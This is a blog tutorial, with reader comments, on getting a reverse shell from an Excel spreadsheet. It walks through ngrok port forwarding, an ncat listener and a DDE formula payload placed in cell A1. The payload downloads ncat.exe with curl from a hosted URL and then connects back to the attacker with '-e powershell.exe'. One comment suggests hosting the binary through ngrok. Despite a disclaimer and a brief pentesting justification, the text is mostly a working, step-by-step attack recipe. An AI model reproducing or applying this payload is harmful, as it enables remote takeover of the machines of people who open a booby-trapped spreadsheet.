Hi Guys, Welcome back to another Blog. I hope you all would be fine :)
Today's Blog is at most related to our previous blog which was about to
* Get Reverse Shell from Word Documents *
In this blog, we are going to perform the same task but this time we would be using up excel rather than Word. But, before we get into its setup, let me warn you that the knowledge you get must never be used to inflict harm to an individual or an organization, and if that happens, we (thedecentshub) will not be held liable.
Lab Environment Configu
So without wasting any further time let's start...
* Lab Environment Configuration
We will be performing all the reverse shell accessor tasks on the Kali Linux Machine and the provider part(the person providing up the reverse Shell) would be using up the Windows environment to access up the Microsoft Excel( this is a must requirement because it allows us to successfully execute Macros)
* Pre-requisites for this task
First, we will be using up the * Ngrok Server * for port forwarding which will provide us with the public identity to our private localhost environment. If you want to know how to set up the Particular Ngrok Server you can check this full video tutorial - Setup the Ngrok Server by Clicking on me!
The second thing we need to set up is the * Ncat tool * to build up the TCP Connection between two computers. We will be designing up a payload that will totally work on Ncat for the reverse Shell procedure.
The third thing in demand is an online free file hosting service where we will host up our Ncat.exe file so that we can provide the URL in our payload and can remove the dependency of this particular Software on the Client Side.
So let's begin :
STEP1: So guys first, we will be forwarding our port using Ngrok Server. Since we want to build TCP Connection between two different PCs we will forward our TCP Port.
For doing it we need to type the command -
./ngrok tcp (for eg: port) 1234
It will forward your Port something like this and will provide a public identity to your private domain.
STEP2: Now guys, you need to use the Ncat tool to open up a listener where you will be provided up with the reverse shell.
Use command - ncat -nvlp 1234(port must be the same as provided in the Ngrok).
If an error comes like that is not installed install it using
In Kali - *sudo apt install ncat *
STEP3: After the listener being opened, we will move to our Excel Payload.
In the shell A1 of our excel sheet, we need to type the given payload-
=cmd| '/C curl -v [URL/path of the ncat.exe hosted online] --output ncat.exe'!nm.A1&cmd| '/C ncat.exe Ngrok HOST Ngrok Port -e powershell.exe'!nm.A1
First let me tell you about the curl command used above, with that curl command our intention is to download the ncat.exe file on the provider's system so that no sort of dependency remains now.
Next, we have provided up the Ncat Command to build the TCP Connection and to provide the PowerShell as a reverse shell to the accessor's PC where the listener is opened.
So finally guys either after saving the file and opening it or executing the macro directly you get the reverse shell to the provider's PC.
But guys, in this case, you get a serious warning from Excel that it's your consent/will to execute this payload. Since anything can be malicious if not taken care of.
The act I demonstrated to you is only for PenTesting Purpose as sometimes due to weak input validation files may contain these sorts of payloads which can cause great loss of data/integrity when executed. So we must properly need to validate all the things and must make sure everything passes after proper encryption and validation.
I have also created up a video on the same topic. If u have any doubts related to the Blog, u can also refer to the below provided YouTube video link -
So Guys, this much for this blog, if you like the content you can follow me up, can also subscribe to my YouTube channel. If you Guys want that I keep bringing this sort of Bogs and videos for you, you can show your support to me ...
You are already getting a URL from ngrok so you don't need to sign up for any free service to host the ncat file. Ngrok has an option for you to be able to host something.
Want to learn about CyberSecurity | Pentesting and much more stuff. Join our YouTube Channel Today....
Coding | Application Development
Want to grow up your skills in Coding Career and get highly paid Jobs. Connect with me on Social Media Platforms and Subscribe to My YouTube Channel for awesome videos.
Work with me
If you want to connect to me for some Freelance work on different Projects.
Awesome Blogs on Coding | CyberSecurity
Do not like motion videos, but want to read and learn. Stay connected to me and follow me on Blogger so that you never miss any of my latest Blogs.
Great blog, really helpful!! Thanks!!
ReplyDeleteThanks, Glad You liked the content.
DeleteYou are already getting a URL from ngrok so you don't need to sign up for any free service to host the ncat file. Ngrok has an option for you to be able to host something.
ReplyDelete